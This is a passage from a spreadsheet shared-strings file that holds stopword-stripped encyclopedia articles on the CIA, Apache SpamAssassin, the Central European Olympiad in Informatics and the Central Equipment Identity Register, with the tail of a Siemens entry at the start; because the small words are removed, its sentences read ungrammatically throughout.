1971) bernhard plettner (1971 1981) karlheinz kaske (1981 1992) heinrich pierer (1992 2005) klaus kleinfeld (2005 2007) peter löscher (2007 2013) kaeser (2013 2021) roland busch (2021 present)chairmen siemens supervisory board (1966 present) ernst siemens (1966 1971) peter siemens (1971 1981) bernhard plettner (1981 1988) heribald närger (1988 1993) hermann franz (1993 1998) karl-hermann baumann (1998 2005) heinrich pierer (2005 2007) gerhard cromme (2007 2018) hagemann snabe (2018 present)managing board (present day) roland busch (ceo siemens klaus helmrich cedrik neike (ceo digital industries) matthias rebellius (ceo smart infrastructure) ralf thomas (cfo) judith wiese also renewable energy commercialization references further reading external links official website documents clippings siemens 20th century press archives siemens historical institute</t>
  </si>
  <si>
    <t>Central Intelligence Agency</t>
  </si>
  <si>
    <t xml:space="preserve">central intelligence agency (cia known informally agency historically company, civilian foreign intelligence service federal government united states, officially tasked gathering, processing, analyzing national security information around world, primarily human intelligence (humint) performing covert actions. principal member united states intelligence community (ic), reports director national intelligence primarily focused providing intelligence president cabinet united states. president harry truman created central intelligence group direction director central intelligence presidential directive january 1946, group transformed central intelligence agency implementation national security 1947. unlike federal bureau investigation (fbi), domestic security service, enforcement function officially mainly focused overseas intelligence gathering, limited domestic intelligence collection. serves national manager coordination humint activities across u.s. intelligence community. agency authorized carry oversee covert action behest president. exerts foreign political influence tactical divisions, special activities center. also instrumental establishing intelligence services several u.s. allied countries, germany's bnd. also provided support many foreign political groups governments, including planning, coordinating, training torture, technical support. involved carrying several regime changes, terrorist attacks, planned assassinations foreign leaders.since 2004 organized office director national intelligence (odni). despite transferring powers dni, grown size response september attacks. 2013, washington post reported fiscal year 2010, largest budget agencies, exceeding previous estimates.the increasingly expanded role, including covert paramilitary operations. largest divisions, information operations center (ioc), officially shifted focus counter-terrorism offensive cyber-operations.the agency subject many controversies, including human rights violations, domestic wiretapping propaganda, allegations drug trafficking. also appeared works fiction, including books, films video games. purpose when created, purpose create clearinghouse foreign policy intelligence analysis. today, primary purpose collect, analyze, evaluate, disseminate foreign intelligence, carry covert operations. according fiscal 2013 budget, five priorities: counterterrorism, priority nonproliferation nuclear weapons mass destruction. warning/informing american leaders important overseas events. counterintelligence cyber intelligence. organizational structure executive office five major directorates: directorate digital innovation directorate analysis directorate operations directorate support directorate science technology executive office director central intelligence agency (d/cia) appointed president senate confirmation reports directly director national intelligence (dni); practice, director interfaces director national intelligence (dni), congress, white house, deputy director (dd/cia) internal executive chief operating officer (coo/cia), known executive director 2017, leads day-to-day work third highest post cia. deputy director formally appointed director without senate confirmation, president's opinion plays great role decision, deputy director generally considered political position, making chief operating officer senior non-political position career officers.the executive office also supports u.s. military providing information gathers, receiving information military intelligence organizations, cooperates field activities. executive director charge day-to-day operation cia. each branch military service director. associate director military affairs, senior military officer, manages relationship unified combatant commands, produce deliver regional/operational intelligence consume national intelligence produced cia. directorate analysis directorate analysis, much history known directorate intelligence (di), tasked helping "the president policymakers make informed decisions country's national security" looking available information issue organiz[ing] policymakers". directorate four regional analytic groups, groups transnational issues, three focus policy, collection, staff support. there office dedicated iraq; regional analytical offices covering near east south asia, russia europe; asian pacific, latin american, african offices. directorate operations directorate operations responsible collecting foreign intelligence (mainly clandestine humint sources), covert action. name reflects role coordinator human intelligence activities elements wider u.s. intelligence community humint operations. this directorate created attempt years rivalry influence, philosophy, budget united states department defense (dod) cia. spite this, department defense recently organized global clandestine intelligence service, defense clandestine service (dcs), defense intelligence agency (dia). this directorate known organized geographic regions issues, precise organization classified. directorate science technology directorate science technology established research, create, manage technical collection disciplines equipment. many innovations transferred intelligence organizations, became overt, military services. example, development high-altitude reconnaissance aircraft done cooperation united states force. u-2's original mission clandestine imagery intelligence denied areas soviet union. subsequently provided signals intelligence measurement signature intelligence capabilities, operated force. ds&amp;t organization analyzed imagery intelligence collected reconnaissance satellites called national photointerpretation center (npic), analysts military services. subsequently, npic transferred national geospatial-intelligence agency (nga). directorate support directorate support organizational administrative functions significant units including: office security office communications office information technology directorate digital innovation directorate digital innovation (ddi) focuses accelerating innovation across agency's mission activities. agency's newest directorate. langley, virginia-based office's mission streamline integrate digital cybersecurity capabilities cia's espionage, counterintelligence, all-source analysis, open-source intelligence collection, covert action operations. provides operations personnel tools techniques cyber operations. works information technology infrastructure practices cyber tradecraft. this means retrofitting cyberwarfare. officers help accelerate integration innovative methods tools enhance cia's cyber digital capabilities global scale ultimately help safeguard united states. they also apply technical expertise exploit clandestine publicly available information (also known open source data) using specialized methodologies digital tools plan, initiate support technical human-based operations cia. before establishment digital directorate, offensive cyber operations undertaken cia's information operations center. little known office specifically functions deploys offensive cyber capabilities.the directorate covertly operating since approximately march 2015 formally began operations october 2015. according classified budget documents, cia's computer network operations budget fiscal year 2013 $685.4 million. nsa's budget roughly billion time.rep. adam schiff, california democrat serves ranking member house intelligence committee, endorsed reorganization. "the director challenged workforce, rest intelligence community, nation consider conduct business intelligence world profoundly different 1947 founded," schiff said. training established first training facility, office training education, 1950. following cold war, cia's training budget slashed, negative effect employee retention. response, director central intelligence george tenet established university 2002. university holds courses year, training hires experienced intelligence officers, well support staff. facility works partnership national intelligence university, includes sherman kent school intelligence analysis, directorate analysis' component university.for later stage training student operations officers, least classified training area camp peary, near williamsburg, virginia. students selected, progress evaluated, ways derived oss, published book assessment men, selection personnel office strategic services. additional mission training conducted harvey point, north carolina.the primary training facility office communications warrenton training center, located near warrenton, virginia. facility established 1951 used since least 1955. budget details overall united states intelligence budget classified. under central intelligence agency 1949, director central intelligence federal government employee spend "un-vouchered" government money. government showed 1997 budget $26.6 billion fiscal year. government disclosed total figure non-military intelligence spending since 2007; fiscal 2013 figure $52.6 billion. according 2013 mass surveillance disclosures, cia's fiscal 2013 budget $14.7 billion, total almost budget national security agency. cia's humint budget $2.3 billion, sigint budget $1.7 billion, spending security logistics missions $2.5 billion. "covert action programs," including variety activities cia's drone fleet anti-iranian nuclear program activities, accounts $2.6 billion.there numerous previous attempts obtain general information budget. result, reports revealed cia's annual budget fiscal year 1963 $550 million (inflation-adjusted billion 2022), overall intelligence budget 1997 $26.6 billion (inflation-adjusted 44.9 billion 2022). there accidental disclosures; instance, mary margaret graham, former official deputy director national intelligence collection 2005, said annual intelligence budget billion, 1994 congress accidentally published budget $43.4 billion 2012 dollars) 1994 non-military national intelligence program, including $4.8 billion cia.after marshall plan approved, appropriating $13.7 billion five years, funds $685 million secretly made available cia. portion enormous m-fund, established u.s. government post-war period reconstruction japan, secretly steered cia. employees polygraphing robert baer, analyst former operative, stated normally employee undergoes polygraph examination every three four years. relationship intelligence agencies acts primary humint general analytic agency, director national intelligence, directs coordinates member organizations united states intelligence community. addition, obtains information u.s. government intelligence agencies, commercial information sources, foreign intelligence services. u.s. agencies employees form part national reconnaissance office (nro) workforce, created joint office force operate satellites military. special collections service joint national security agency (nsa) office conducts clandestine electronic surveillance embassies hostile territory throughout world. foreign intelligence services role functions roughly equivalent germany's federal intelligence service (bnd), united kingdom's secret intelligence service (the mi6), australian secret intelligence service (asis), french foreign intelligence service direction générale sécurité extérieure (dgse), russian foreign intelligence service (sluzhba vneshney razvedki, svr), chinese ministry state security (mss), indian research analysis wing (raw), pakistani inter-services intelligence (isi), egyptian general intelligence service, israel's mossad, south korea's national intelligence service (nis). while preceding agencies collect analyze information, like u.s. state department's bureau intelligence research purely analytical agencies.the instrumental establishment intelligence services several u.s. allied countries, including germany's bnd. closest links u.s. foreign intelligence agencies anglophone countries: australia, canada, zealand, united kingdom. special communications signals intelligence-related messages shared four countries. indication united states' close operational cooperation creation message distribution label within main u.s. military communications network. previously, marking noforn (i.e., foreign nationals) required originator specify which, any, non-u.s. countries could receive information. handling caveat, usa/aus/can/gbr/nzl five eyes, used primarily intelligence messages, gives easier indicate material shared australia, canada, united kingdom, zealand. task division called "verbindungsstelle german bundesnachrichtendienst keeping contact office wiesbaden. ireland's directorate military intelligence liaises cia, although member five eyes. history central intelligence agency created july 1947, harry truman signed national security law. major impetus creation agency growing tensions ussr following world immediate predecessors success british commandos world prompted u.s. president franklin roosevelt authorize creation intelligence service modeled british secret intelligence service (mi6), special operations executive. this creation office strategic services (oss) established presidential military order issued president roosevelt june 1942. september 1945, shortly world harry truman signed executive order dissolving oss, october 1945 functions divided departments state war. division lasted months. first public mention "central intelligence agency" appeared command-restructuring proposal presented forrestal arthur radford u.s. senate military affairs committee 1945. army intelligence agent colonel sidney mashbir commander ellis zacharias worked together four months direction fleet admiral joseph ernest king, prepared first draft implementing directives creation would become central intelligence agency. despite opposition military establishment, united states department state federal bureau investigation (fbi), truman established national intelligence authority january 1946. operational extension known central intelligence group (cig), direct predecessor cia. national security lawrence houston, head counsel ssu, cig, and, later cia, principal draftsman national security 1947, dissolved cig, established national security council central intelligence agency. 1949 houston helped draft central intelligence agency (pub.l. 81–110), authorized agency confidential fiscal administrative procedures, exempted limitations federal funds. also exempted disclose "organization, functions, officials, titles, salaries, numbers personnel employed." created program "pl-110" handle defectors "essential aliens" fell outside normal immigration procedures. intelligence action outset korean still thousand employees, around thousand worked analysis. intelligence primarily came office reports estimates, drew reports daily take state department telegrams, military dispatches, public documents. still lacked intelligence-gathering abilities. august 1950, shortly after, truman announced walter bedell smith director cia. change leadership took place shortly invasion south korea, lack clear warning president national security council impending north korean invasion seen grave failure intelligence.the different demands placed various bodies overseeing truman wanted centralized group organize information reached him, department defense wanted military intelligence covert action, state department wanted create global political change favorable thus areas responsibility covert action covert intelligence. main targets intelligence gathering soviet union, also priority cia's predecessors.the united states force general hoyt vandenberg, cig's second director, created office special operations (oso), well office reports estimates (ore). initially tasked spying subversion overseas budget million, largesse small number patrons congress. vandenberg's goals much like ones predecessor; finding "everything soviet forces eastern central europe movements, capabilities, intentions."on june 1948, national security council issued directive 10/2 calling covert action ussr, granting authority carry covert operations "hostile foreign states groups" could, needed, denied u.s. government. end, office policy coordination (opc) created inside cia. unique; frank wisner, head opc, answered director, secretaries defense, state, opc's actions secret even head cia. most stations station chiefs, working oso, working opc.the early track record poor, agency unable provide sufficient intelligence soviet takeovers romania czechoslovakia, soviet blockade berlin, soviet atomic bomb project. particular, agency failed predict chinese entry korean 300,000 troops. famous double agent philby british liaison american central intelligence. through him, coordinated hundreds airdrops inside iron curtain, compromised philby. arlington hall, nerve center cryptanalysis, compromised bill weisband, russian translator soviet spy. however, successful influencing 1948 italian election favor christian democrats. $200 million exchange stabilization fund, earmarked reconstruction europe, used wealthy americans italian heritage. cash distributed catholic action, vatican's political arm, directly italian politicians. this tactic using large fund purchase elections frequently repeated subsequent years. korean beginning korean war, officer hans tofte claimed turned thousand north korean expatriates guerrilla force tasked infiltration, guerrilla warfare, pilot rescue. 1952 sent 1,500 expatriate agents north. seoul station chief albert haney would openly celebrate capabilities agents, information sent. september 1952 haney replaced john limond hart, europe veteran vivid memory bitter experiences misinformation. hart suspicious parade successes reported tofte haney launched investigation determined entirety information supplied korean sources false misleading. after war, internal reviews would corroborate hart's findings. cia's seoul station officers, single speaker korean. hart reported washington seoul station hopeless, could salvaged. loftus becker, deputy director intelligence, sent personally tell hart keep station open save face. becker returned washington, pronounced situation "hopeless," that, touring cia's east operations, cia's ability gather intelligence east "almost negligible". resigned. force colonel james kallis stated director allen dulles continued praise cia's korean force, despite knowing enemy control. when china entered 1950, attempted number subversive operations country, failed presence double agents. millions dollars spent efforts. these included team young officers airdropped china ambushed, funds used global heroin empire burma's golden triangle following betrayal another double agent. 1953 iranian coup d'état 1951, mohammad mosaddegh, member national front, elected iranian prime-minister. prime minister, nationalized anglo-iranian company predecessor supported. nationalization british-funded iranian industry, including largest refinery world, disastrous mosaddegh. british naval embargo closed british facilities, iran skilled workers operate. 1952, mosaddegh resisted royal refusal approve minister resigned protest. national front took streets protest. fearing loss control, military pulled troops back five days later, shah mohammad reza pahlavi gave mosaddegh's demands. mosaddegh quickly replaced military leaders loyal shah loyal him, giving personal control military. given months emergency powers, mosaddegh unilaterally passed legislation. when months expired, powers extended another year. 1953, mossadegh dismissed parliament assumed dictatorial powers. this power grab triggered shah exercise constitutional right dismiss mosaddegh. mosaddegh launched military coup shah fled country. under director allen dulles, operation ajax motion. goal overthrow mossadegh military support general fazlollah zahedi install pro-western regime headed shah iran. kermit roosevelt oversaw operation iran. august inner military circle protected paid ayatollah ruhollah khomeini would spark embassy officer called almost spontaneous revolution" mosaddegh, unable gain influence within iranian military. their chosen man, former general fazlollah zahedi, troops call after failure first coup, roosevelt paid demonstrators pose communists deface public symbols associated shah. this august incident helped foster public support shah gangs citizens spree violence intent destroying mossadegh. attack house would force mossadegh flee. surrendered next day, coup came end. 1954 guatemalan coup d'état return shah power, impression, cultivated allen dulles, effective able guide nation friendly stable relations west triggered planning operation pbsuccess, plan overthrow guatemalan president jacobo arbenz. plan exposed major newspapers happened agent left plans coup guatemala city hotel room.the guatemalan revolution 1944–54 overthrew u.s. backed dictator jorge ubico brought democratically elected government power. government began ambitious agrarian reform program attempting grant land millions landless peasants. this program threatened land holdings united fruit company, lobbied coup portraying reforms communist.on june 1954, carlos castillo armas cia-trained across border honduras guatemala. weapons also come cia. also mounted psychological campaign convince guatemalan people government armas' victory fait accompli, largest part radio broadcast entitled "the voice liberation" announced guatemalan exiles castillo armas shortly liberate country. june plane bombed guatemala city, destroying government's main reserves. árbenz ordered army distribute weapons local peasants workers. army refused, forcing jacobo árbenz's resignation june 1954. árbenz handed power colonel carlos enrique diaz. orchestrated series power transfers ended confirmation castillo armas president july 1954. armas first series military dictators would rule country, leading brutal guatemalan civil 1960 1996, 200,000 people killed, mostly u.s.-backed military. syria 1949, colonel adib shishakli rose power syria cia-backed coup. four years later, would overthrown military, ba'athists, communists. started funding right-wing members military suffered huge setback aftermath suez crisis. agent rocky stone, played minor role 1953 iranian coup d'état, working damascus embassy diplomat station chief. syrian officers dole quickly appeared television stating received money "corrupt sinister americans" attempt overthrow legitimate government syria." syrian forces surrounded embassy rousted agent stone, confessed subsequently made history first american diplomat expelled arab nation. this strengthened ties syria egypt, helping establish united arab republic, poisoning well foreseeable future. indonesia charismatic leader indonesia president sukarno. declaration neutrality cold suspicions him. after sukarno hosted bandung conference, promoting non-aligned movement, eisenhower white house responded 5518 authorizing "all feasible covert means" move indonesia western sphere.the clear policy indonesia. eisenhower sent special assistant security operations, dearborn jr., jakarta. report high instability, lacked stable allies, reinforced domino theory. indonesia suffered described "subversion democracy". decided attempt another military coup indonesia, indonesian military trained strong professional relationship military, pro-american officer corps strongly supported government, strong belief civilian control military, instilled partly close association military.on september 1957, eisenhower ordered start revolution indonesia goal regime change. three days later, blitz, soviet-controlled weekly india, reported plotting overthrow sukarno. story picked media indonesia. first parts operation 11,500-ton navy ship landing sumatra, delivering weapons many 8,000 potential revolutionaries.in support revolutionary government republic indonesia-permesta movement, formed dissident military commanders central sumatera north sulawesi overthrowing sukarno regime, b-26 piloted agent allen lawrence pope attacked indonesian military targets april 1958. described airstrikes president attacks "dissident planes." pope's b-26 shot ambon, indonesia 1958, bailed out. when captured, indonesian military found personnel records, after-action reports, membership card officer's club clark field. march foster dulles, secretary state, brother allen dulles made public statement calling revolt communist despotism sukarno. three days later, reported white house indonesian army's actions cia-supported revolution suppressing communism.after indonesia, eisenhower displayed mistrust director, allen dulles. dulles displayed mistrust itself. abbot smith, analyst later became chief office national estimates, said, constructed picture ussr, whatever happened made picture. intelligence estimators hardly commit abominable sin." december eisenhower received report intelligence board consultants said agency "incapable making objective appraisals intelligence information well operations." democratic republic congo election patrice lumumba prime minister, acceptance soviet support congo crisis, another possible cuba. this view swayed white house. eisenhower ordered lumumba "eliminated." september 1960, president joseph kasa-vubu ordered dismissal lumumba cabinet. delivered quarter million dollars joseph mobutu october, favored congolese political figure. lumumba imprisoned mobutu december handed katangan authorities who, belgium, executed firing squad january 1961. gary powers shootdown after bomber came missile gap. eisenhower wanted disprove missile gap, banned overflights ussr meeting secretary khrushchev camp david. another reason president objected that, nuclear age, intelligence needed intentions, without which, would face paralysis intelligence. particularly worried flights could seen preparations first-strike attacks. high hopes upcoming meeting khrushchev paris. eisenhower finally gave pressure authorize 16-day window flights, extended additional days poor weather. 1960, ussr shot flying soviet territory. eisenhower, ensuing coverup destroyed perceived honesty hope leaving legacy thawing relations khrushchev. eisenhower later said coverup greatest regret presidency.: dominican republic human rights abuses generalissimo rafael trujillo lasted three decades united states severed diplomatic relations dominican republic august 1960. cia's special group armed dominicans assassinate trujillo, kennedy paused plan became president. kennedy allowed distribution four additional machine guns, trujillo died gunshot wounds weeks later 1961. aftermath, robert kennedy wrote succeeded failed many times past, face success, caught flatfooted, failed plan next. pigs welcomed fidel castro visit gave face-to-face briefing. hoped castro would bring friendly democratic government, planned curry favor money guns. december 1959, memo reached dci's desk recommending castro's "elimination." dulles replaced word "elimination" "removal," wheels motion. mid-august 1960, dick bissell would seek, blessing cia, hire mafia assassinate castro.the pigs invasion failed military invasion cuba undertaken cia-sponsored paramilitary group brigade 2506 april 1961. counter-revolutionary military, trained funded cia, brigade 2506 fronted armed wing democratic revolutionary front (drf) intended overthrow increasingly communist government fidel castro. launched guatemala, invading force defeated within three days cuban revolutionary armed forces, direct command prime minister fidel castro. president dwight eisenhower concerned direction castro's government taking, march 1960, eisenhower allocated $13.1 million plan castro's overthrow. proceeded organize operation various cuban counter-revolutionary forces, training brigade 2506 guatemala. over 1,400 paramilitaries cuba boat april days later april eight cia-supplied b-26 bombers attacked cuban airfields. night april main invasion landed pigs, april invaders finally surrendered. failed invasion strengthened position castro's leadership well ties ussr. this eventually events cuban missile crisis 1962. invasion major embarrassment foreign policy. president john kennedy ordered number internal investigations across latin america.the taylor board commissioned determine went wrong cuba. board came conclusion president's board consultants foreign intelligence activities concluded, many reviews prior, come, covert action completely isolated intelligence analysis. inspector general investigated pigs. concluded need improve organization management drastically. special group (later renamed committee) convened oversight role. cuba: sabotage terrorism after failure attempted invasion pigs, proposed program sabotage terrorist attacks civilian military targets cuba, stated intent bring cuban administration institute government. authorized president november 1961. operation engage extensive campaign terrorist attacks civilians economic targets, killing significant numbers civilians, carry covert operations cuban government.the established base operation miami, given cryptonym jmwave. operation extensive housed largest number officers outside langley, eventually numbering four hundred. major employer florida, several thousand agents clandestine agency. terrorist activities carried agents armed, organized sponsored source tension u.s. cuban governments. they major factor contributing soviet decision place missiles cuba, leading cuban missile crisis.the attacks continued 1965. though level terrorist activity directed lessened second half 1960s, 1969 directed intensify operations cuba. exile terrorists still employ mid-1970s, including luis posada carriles. remained cia's payroll february 1976, contact continued least june year. posada widely believed responsible october 1976 cubana flight bombing, killing people deadliest instance airline terrorism western hemisphere prior attacks september 2001 york.despite damage done civilians killed cia's terrorist attacks, measure stated objective project complete failure. early cold war, 1953–1966 involved anti-communist activities burma, congo, guatemala, laos. operations laos continued well 1970s.there suggestions soviet attempt missiles cuba came, indirectly, realized badly compromised us–uk defector place, oleg penkovsky. significant operations ever undertaken directed zaïre support general-turned-dictator mobutu sese seko. brazil united states government involved 1964 brazilian coup d'état. coup occurred march april resulted brazilian armed forces ousting president joão goulart. united states goulart left-wing threat latin america. secret cables written ambassador brazil, lincoln gordon, confirmed involved covert action brazil. encouraged "pro-democracy street rallies" brazil, instance, create dissent goulart. indochina, tibet vietnam (1954–1975) patti mission arrived vietnam near world significant interaction leaders many vietnamese factions, including minh.the tibetan program consisted political plots, propaganda distribution, paramilitary intelligence gathering based u.s. commitments made dalai lama 1951 1956.during period u.s. combat involvement vietnam war, considerable argument progress among department defense robert mcnamara, cia, and, extent, intelligence staff military assistance command vietnam.sometime 1959 1961, started project tiger, program dropping south vietnamese agents north vietnam gather intelligence. these failures; deputy chief project tiger, captain tien, admitted agent hanoi. johnson face failure project tiger, pentagon wanted paramilitary forces participate plan 64a. this resulted cia's foreign paramilitaries command dod, move seen slippery slope inside cia, slide covert action towards militarization.the antiwar movement rapidly expanded across united states johnson presidency. johnson wanted director richard helms substantiate johnson's hunch moscow beijing financing influencing american antiwar movement. thus, fall 1967, launched domestic surveillance program code-named chaos would linger total seven years. police departments across country cooperated tandem agency, amassing "computer index 300,000 names american people organizations, extensive files 7,200 citizens." helms hatched "special operations group" "[eleven] officers grew long hair, learned jargon left, went infiltrate peace groups united states europe."a analyst's assessment vietnam "becoming progressively divorced reality... [and] proceeding courage wisdom". nixon 1971, engaged domestic spying. eavesdropping kissinger. white house camp david wired sound. nixon kissinger eavesdropping aides, well reporters. famously, nixon's plumbers number many former officers, including howard hunt, mccord, eugenio martinez. july 1971, john ehrlichman, nixon's domestic policy chief, told cushman, nixon's hatchet-man cia, cushman "know [hunt] was, fact, things president... </t>
  </si>
  <si>
    <t>Apache SpamAssassin</t>
  </si>
  <si>
    <t>apache spamassassin computer program used e-mail spam filtering. uses variety spam-detection techniques, including fuzzy checksum techniques, bayesian filtering, external programs, blacklists online databases. released apache license part apache foundation since 2004. program integrated mail server automatically filter mail site. also individual users mailbox integrates several mail programs. apache spamassassin highly configurable; used system-wide filter still configured support per-user preferences. history apache spamassassin created justin mason, maintained number patches earlier program named filter.plx mark jeftovic, turn begun august 1997. mason rewrote jeftovic's code scratch uploaded resulting codebase sourceforge april 2001.in summer 2004 project became apache software foundation project later officially renamed apache spamassassin.the spamassassin 3.4.2 release september 2019 first three years, developers "the project picked developers moving forward again.".in december 2019, version 3.4.3 spamassassin released. april, 2021, version 3.4.6 spamassassin released. announced development version 4.0.0 would become project's focus. methods usage apache spamassassin perl-based application (mail::spamassassin cpan) usually used filter incoming mail several users. standalone application subprogram another application (such milter, sa-exim, exiscan, mailscanner, mimedefang, amavis) client (spamc) communicates daemon (spamd). client/server embedded mode operation performance benefits, certain circumstances introduce additional security risks. typically either variant application generic mail filter program, called directly mail user agent supports this, whenever mail arrives. mail filter programs procmail made pipe incoming mail apache spamassassin adjustment user's procmailrc file. operation apache spamassassin comes large rules applied determine whether email spam not. most rules based regular expressions matched body header fields message, apache spamassassin also employs number spam-fighting techniques. rules called "tests" spamassassin documentation. each test score value assigned message matches test's criteria. scores positive negative, positive values indicating "spam" negative "ham" (non-spam messages). message matched tests apache spamassassin combines results global score assigned message. higher score, higher probability message spam. apache spamassassin internal (configurable) score threshold classify message spam. usually message considered spam matches multiple criteria; matching single test usually enough reach threshold. apache spamassassin considers message spam, rewritten. default configuration, content mail appended mime attachment, brief excerpt message body, description tests resulted mail classified spam. score lower defined settings, default information tests passed total score still added email headers used post-processing less severe actions, tagging mail suspicious. apache spamassassin allows per-user configuration behavior, even installed system-wide service; configuration read file database. configuration users specify individuals whose emails never considered spam, change scores certain rules. user also define list languages want receive mail apache spamassassin assigns higher score mails appear written another language. apache spamassassin based heuristics (pattern recognition), software exhibits false positives false negatives. network-based filtering methods apache spamassassin also supports: dns-based blacklists dns-based whitelists fuzzy-checksum-based spam detection filters distributed checksum clearinghouse, vipul's razor cloudmark authority plugins (commercial) hashcash email stamps based proof-of-work sender policy framework domainkeys identified mail blacklists surbl uribl track spam websitesmore methods added reasonably easily writing perl plug-in apache spamassassin. bayesian filtering apache spamassassin reinforces rules bayesian filtering user administrator "feeds" examples good (ham) (spam) filter order learn difference two. purpose, apache spamassassin provides command-line tool sa-learn, instructed learn single mail entire mailbox either spam. typically, user move unrecognized spam separate folder, sa-learn folder non-spam folder spam separately. alternatively, mail user agent supports sa-learn called individual emails. regardless method used perform learning, spamassassin's bayesian test help score future e-mails based learning improve accuracy. licensing apache spamassassin free/open source software, licensed apache license 2.0. versions prior dual-licensed artistic license general public license. sa-compile sa-compile utility distributed apache spamassassin compiles spamassassin ruleset deterministic finite automaton allows apache spamassassin processor power efficiently. testing apache spamassassin apache spamassassin designed trigger gtube, 68-byte string similar antivirus eicar test file. string inserted 5322 formatted message passed apache spamassassin engine, apache spamassassin trigger weight 1000. also anti-spam techniques notes references external links official website apache spamassassin wiki apache spamassassin rule updates wiki automatically updating apache spamassassin kam.cf ruleset apache spamassassin</t>
  </si>
  <si>
    <t>Central European Olympiad in Informatics</t>
  </si>
  <si>
    <t>central european olympiad informatics (ceoi) annual informatics competition secondary school students. each participating central european countries (plus guest countries, local team host area) sends team four contestants, team leader deputy team leader. contestants compete individually, i.e. team score calculated. competitors selected national competitive programming contests. contest consists days computer programming, solving problems algorithmic nature. structure competition days described article international olympiad informatics (ioi), served role model local ceoi. first ceoi held 1994 romania (founder ceoi), five years first ioi. list ceoi websites locations ceoi 2021 supposed held zagreb, croatia, held online instead september 2021). ceoi 2020 held nagykanizsa, hungary august 2020). ceoi 2019 held bratislava, slovakia july 2019). ceoi 2018 held warsaw, poland august 2018). ceoi 2017 held ljubljana, slovenia july 2017). results ceoi 2016 held piatra neamț, romania july 2016). participants: bulgaria, croatia, czech republic, georgia, germany, hungary, moldova, poland, romania, slovakia, slovenia, switzerland. ceoi 2015 held brno, czech republic june july 2015). participants: croatia, czech republic, georgia, germany, hungary, poland, romania, slovakia, slovenia, switzerland. ceoi 2014 held jena, germany june 2014). ceoi 2013 held primošten, croatia october 2013). participants: croatia, czech republic, germany, hungary, poland, romania, switzerland, slovakia slovenia. ceoi 2012 held tata, hungary (7-13 july 2012). participants: bulgaria, croatia, czech republic, germany, hungary, poland, romania, israel, switzerland, netherlands, slovakia slovenia. ceoi 2011 held gdynia, poland (7-12 july 2011). participants: bulgaria, croatia, czech republic, germany, hungary, poland, romania, slovakia, slovenia switzerland. ceoi 2010 held košice, slovakia (12-19 july 2010). participants: bulgaria, croatia, czech republic, germany, hungary, poland, romania, slovakia, switzerland. ceoi 2009 held târgu mureş, romania (8-14 july 2009). participants: croatia, czech republic, germany, hungary, poland, romania, slovakia, switzerland, usa., serbia, moldova. ceoi 2008 held dresden, germany (6-12 july 2008). participants: croatia, czech republic, germany, hungary, israel, poland, romania, saxony, slovakia. ceoi 2007 held brno, czech republic july 2007). participants: croatia, czech republic, germany, hungary, poland, romania, slovakia, czech republic brno. ceoi 2006 held vrsar, croatia july 2006). participants: croatia, czech republic, germany, hungary, poland, romania, slovakia, croatia croatia iii. ceoi 2005 held sárospatak, hungary july august, 2005). participants: bosnia herzegovina, croatia, czech republic, estonia, france, germany, hungary, poland, romania, sárospatak, slovakia, spain, netherlands. ceoi 2004 held rzeszów, poland july july 2004). participants: bosnia herzegovina, croatia, czech republic, germany, hungary, poland, romania, slovakia ceoi 2003 held münster, germany july 2003). participants: croatia, poland, czech republic, slovenia, netherlands, usa, hungary, slovakia, romania, iran, germany, westphalia ceoi 2002 held košice, slovakia june july 2002). participants: austria, croatia, czech republic, germany, hungary, poland, romania, slovakia, slovenia, netherlands, iran ceoi 2001 held zalaegerszeg, hungary august 2001). participants: austria, croatia, czech republic, germany, hungary, poland, romania, slovakia, slovenia, estonia, finland, italy, netherlands ceoi 2000 held cluj-napoca, romania august 2000). participants: croatia, czech republic, germany, hungary, moldova, netherlands, poland, romania, slovakia, slovenia, ceoi 1999 held brno, czech republic september 1999). participants: bosnia-herzegovina, croatia, czech republic, germany, hungary, poland, romania, slovakia, slovenia, ceoi 1998 held zadar, croatia 1998). participants: bosnia-herzegovina, croatia, czech republic, germany, hungary, poland, romania, slovakia, slovenia ceoi 1997 held nowy sącz, poland july 1997). participants: belarus, croatia, estonia, germany, hungary, latvia, lithuania, netherlands, poland, romania, slovakia, ukraine, usa, yugoslavia ceoi 1996 held bratislava, slovak republic october 1996). participants: croatia, czech republic, hungary, poland, romania, slovakia, slovenia ceoi 1995 held szeged, hungary june 1995). participants: belarus, croatia, czech republic, estonia, hungary, lithuania, poland, romania, slovakia, ukraine, yugoslavia ceoi 1994 held cluj-napoca, romania 1994). participants: croatia, czech republic, hungary, moldova, poland, romania, turkey, yugoslavia also international science olympiads international olympiad informatics computing olympiad external links ceoi archives international science olympiads</t>
  </si>
  <si>
    <t>Central Equipment Identity Register</t>
  </si>
  <si>
    <t>central equipment identity register (ceir) database mobile equipment identifiers (imei networks standard, meid networks cdma standard). such identifier assigned slot mobile device. lists imeis the: white devices allowed register cellular network, black devices prohibited register cellular network, grey devices intermediate status (when defined lists black white device placed).depending rules mobile equipment registration country ceir database contain lists fields beside imei. example, subscriber number (msisdn), bound imei, individual (passport data, national etc.) registered imei database, details importer brought device country, etc. originally abbreviation ceir stood imei database, created provided association. proposed blacklist imeis stolen lost phones. assumed would able receive list block registration devices network. thus, turns stolen phone, blacklisted gsma ceir, cannot used large number cellular networks, means theft mobile devices become meaningless. however, soon became clear mnos initiative going many phones stopped working networks, works another, puts disadvantage lead outflow subscribers. became clear blocking stolen devices introduced simultaneously mobile networks country legislative measures initiative communications regulator. case, rule, national imei database created, contains general lists blocked imeis. since registration cellular operator's network directly blocked network node called (equipment identity register), system contains national imei base became known central (ceir). avoid confusion database association renamed imei database imei 2003-2008, “document history” imei database file format specification). also sometimes common imei database several eirs called seir (shared eir). country, ceir interact imei differently. national ceir communicate imei all. firstly, separately decided whether ceir send information blacklist imei (which imeis placed removed there). secondly, upon receipt blacklist imei regulator decides countries receive (imei stores information exactly blacklisted imei). example, list neighboring countries, countries region, around world. addition blacklist, gsma developing list imeis allocated manufacturers devices. manufacturer device model gets least (type allocation code) allocated gsma, consisting digits, 6-digit serial number obtain imei. thus, tac, manufacturer release million devices unique imei. usually, ceir receives list allocated tacs gsma, since first digits imei device list, sign counterfeit. central database identifiers work networks, cdma, purposes necessary interact another worldwide database contains meids meid database.a system directly blocks registration mobile device cellular network eir. each must least eir, imei check requests (checkimei) sent registering device network. typical ceri interaction scheme: ceir accumulates black, white, grey lists using various data sources verification methods. these lists periodically transmitted eirs. uses processing every checkimei request determine whether allow device network not.eir transmit data ceir database too. usually, changes grey list imeis network list transmitted ceir. addition synchronizing lists across multiple networks, main function ceir implement scenarios changes lists. this usually requires interaction various systems (databases) organizations and/or subscribers. еxamples scenarios: whitelisting imei devices imported legal entity whitelisting imei devices manufactured domestically 